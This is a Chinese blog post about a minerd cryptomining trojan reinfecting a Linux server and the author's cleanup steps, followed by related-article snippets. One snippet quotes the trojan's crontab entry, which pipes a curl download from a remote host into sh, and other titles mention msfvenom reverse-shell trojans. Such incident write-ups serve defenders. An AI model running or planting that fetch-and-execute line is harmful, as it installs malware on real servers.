Linux minerd木马清除(续)

最新推荐文章于 2024-01-26 14:56:05 发布
最新推荐文章于 2024-01-26 14:56:05 发布
阅读量3.6k 收藏
点赞数 2
分类专栏: 杂项 文章标签: Linux 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oarsman/article/details/51934454
版权

前两天清除了minerd木马之后,服务器一直运行良好。本来以为就这样解决问题了。结果,今天晚上,突然收到监控组的告警,说服务器再度变慢,不但cpu 100%了,就是连带宽也100%了。我晕,于是SSH上去一看,哇塞,minerd 又回来了。而且还变本加厉,连带宽都占满了。

于是,老步骤。全部清理完之后。感觉还是不对。难道是服务器又被入侵了?查了下防火墙日志,似乎没有问题。SSH端口,密码之类的也全都改了。于是,耐下心来,用ps 将所有的进程列出来,一一查看一遍。由于服务器连续运行时间不短了,木马是最近才出现的,所以PID 比较小的进程就不用太关注,重点关注比较大的。这一看,果然又发现了一个可以的东西, 有一个进程居然运行着/var/tmp/ 下面的一段命令。看来看去应该就是他了。老办法,先将/var/tmp下的所有文件用chmod 000 改掉权限。然后kill掉可疑进程。然后再删除/var/tmp下的所有文件。

嗯,怎么说呢,截止目前,还没有发现死灰复燃的情况。但愿问题就这么解决了,剩下的需要在持续观察了,看看会不会再出问题。

毕竟俺只是个程序员,不是安全工程师啊,不要以为俺什么都能干啊,老板。

oarsman
关注
专栏目录
Linux清除木马minerd
骆驼大笨笨
08-02 9933
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
php实现Linux服务器木马排查及加固功能
10-24
在网络安全日益重要的今天,PHP实现Linux服务器木马排查及加固功能显得至关重要。本文将详细讲解如何利用PHP进行木马排查以及采取哪些措施来加固服务器安全。 首先,针对特征码查找是木马排查的基础。PHP木马通常会...
Linux minerd木马清除
oarsman的专栏
07-13 3081
最近一段时间,总是有人反映公司的一台测试服务器访问速度很慢,半天都打不开。开始的时候,以为是这两天新部署的测试程序导致的。想着测试完关掉就没有事情了。后来,仔细想了想,觉得不对。新的测试程序,并不是很消耗资源啊。于是登上去看了看,不看不知道,一看吓一跳。 top命令一查,发现有一个叫做 minerd进程,居然占用了99%的CPU. 这个东西一看名字,就不是什么好东西。肯定是别人挂的木马啦。
Linux服务器挖矿木马清除
lurenyi333的博客
01-23 1624
异常现象 1.服务器CPU总占用50%,部分进程占用800%左右(共16核) top 定位 1.数据传输 netstat -lntupa 2.定时任务 [root@bogon .new]# cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {} * * * * * /tmp/.ICE-unix/.new/-bash > /dev/null 2>&1; no crontab for bin no crontab
linux minerd 进程,linux中了minerd之后的完全清理过程(详解)
weixin_35930255的博客
04-29 269
一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了下面就是清理过程第一步1.立即停止redis服务,修改端口权限,增加密码措施2.按照网上的资料 删除 crontab 里的两个内容sudo rm /var/spool/cron/...
彻底清除Linux centos minerd木马 wnTKYg木马
把酒问天专栏
08-11 1136
转载: http://jingyan.baidu.com/article/b7001fe1bf71ee0e7282dddb.html 由于用的是临时服务器,安全性上疏忽了,导致受到了minerd木马攻击,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理。 现状描述 1 top可以看到,这个minerd
linux中了minerd之后完全清理过程
qiushi888的专栏
08-08 3324
一不小心装了一个redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊 某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了 第一步 1.立即停止redis服务,修改端口权限,增加密码措施 2.按照网上的资料 删除 crontab 里的两个内容 sudo rm
linux top下的 minerd 木马清除方法
09-15
下面小编就为大家带来一篇linux top下的 minerd 木马清除方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
通过linux 木马控制Linux
06-13
### 通过Linux木马控制Linux系统 在网络安全领域,了解如何使用特定工具和技术进行渗透测试是十分重要的。本文将详细介绍如何使用Metasploit框架下的`msfvenom`工具生成Linux ELF木马,并通过该木马实现对目标系统...
腾讯云服务器被黑客挂pnscan病毒排查
范大的博客
10-19 1484
腾讯云服务被黑客挂载病毒,CPU负荷过高且top无法查看
Linux被kdevtmpfsi,pnscan挖矿病毒入侵记录
懒得一批的打工人博客
08-17 919
Linux被kdevtmpfsi,pnscan挖矿病毒入侵 记录起因 从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告。登陆平台后发现站内信 好在腾讯没有直接停用我的服务器,直接进入服务使用top观察了一会高占用进程 发现kdevtmpfsi 和 pnscan 已经把我的cpu跑满了。 pnscan病毒感染惨状: 使用top & ps & netstat 等等命令,都无法正常使用 CPU基本100%,时不时网络中断 redis端口6379
阿里云服务器被pnscan挖矿病毒入侵如何解决?
最新发布
m0_64344919的博客
01-26 1261
针对将SpringBoot项目打包docker镜像部署到服务器上出现的后问题,有关2375端口开放的问题
Linux DDoS 木马再度来袭
weixin_33875564的博客
09-26 241
导读 Linux用户又有一个木马需要苦恼了,就像以往一样,这些黑客大多部署在被劫持的Linux系统上,并在接受到命令后发起DDoS攻击。 发现这件事的Dr.Web的安全研究人员说:“木马似乎是通过破壳漏洞感染的这些Linux机器——现在仍然有很多设备没有补上这个漏洞。”该木马被命名为Linux.DDoS.93,它首要会修改/var/run/dhcpclient-eth0...
木马查找清除攻略
JonnyWei的专栏
04-22 1051
 这年头的网络越来越不安全了,黑客制作工具比Word还要简单,随便一个菜鸟都可以借助工具制作出“马”力强劲的攻击武器。看网页、收邮件、聊QQ都有可能被马“踩”到。稍不留意,你的个人信息、账户、密码等重要信息就会被它“驮”走,你知道如何识马、抓马、赶马吗?下面的招数将告诉你如何对付这些顽劣的马。一、学伯乐 认马识马 木马这东西从本质上说,就是一种远程控制软件。不过远程控制软件
linux系统挖矿木马清理流程
qq_42430287的博客
04-12 1073
一、查看cpu占用率 如果您的主机CPU占用率居高不下,那么主机很有可能已经被植入了挖矿木马,会影响服务器上的其他应用的正常运行,需要立刻上机排查。 top -c 二、清理挖矿木马 1.及时隔离主机 2.阻断异常网络通信 挖矿木马不仅会连接矿池,还有可能会连接黑客的C2服务器,接收并执行C2指令、投递其他恶意木马,所以需要及时进行网络阻断。 1)检查主机防火墙当前生效的iptables规则中是...
一键清理网站木马文件,从此网站拥有专属保镖 ——阿里云虚拟主机推出木马查杀功能...
阿里云云栖号
01-04 1426
摘要: 近日,阿里云推出了云虚拟主机网站木马查杀的新功能,十分适合对网站安全不了解、不熟悉的用户,或网站出现挂马情况不清楚如何处理的用户。 阿里云表示,此次网站木马查杀功能是阿里云安骑士专为虚拟主机推出的安全增值服务。近日,阿里云推出了云虚拟主机网站木马查杀的新功能,十分适合对网站安全不了解、不熟悉的用户,或网站出现挂马情况不清楚如何处理的用户。阿里云表示,此次网站木马查杀功能是阿里云安骑士专为虚...
记录一次服务器被pnscan病毒攻击的处理理财
qq_34814794的博客
05-02 844
记录一次服务器被pnscan病毒攻击的处理理财 起始 凌晨收到腾讯云的安全告警短信大概意思:我的服务器恶意对外攻击。 第一反应就是被挟持了,这个服务器只是用来测试学习用的,所以并不慌。 初步处理 刚开始想无非就是黑客通过开放端口攻击我的服务器然后攻击别人的服务器。 登录服务器查看 netstat -antp tcp 0 1 10.0.20.9:46146 154.236.210.203:6379 SYN_SENT 6494/pnscan
利用msfvenom创建Linux ELF木马反弹Shell教程
本资源主要介绍了如何通过Metasploit(MSF)框架生成Linux ELF木马并实现反弹Shell,以此来远程控制Linux系统。其中涉及的技术包括利用MSFvenom创建木马、设置反弹连接参数、在攻击机上架设HTTP服务、监听木马连接,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值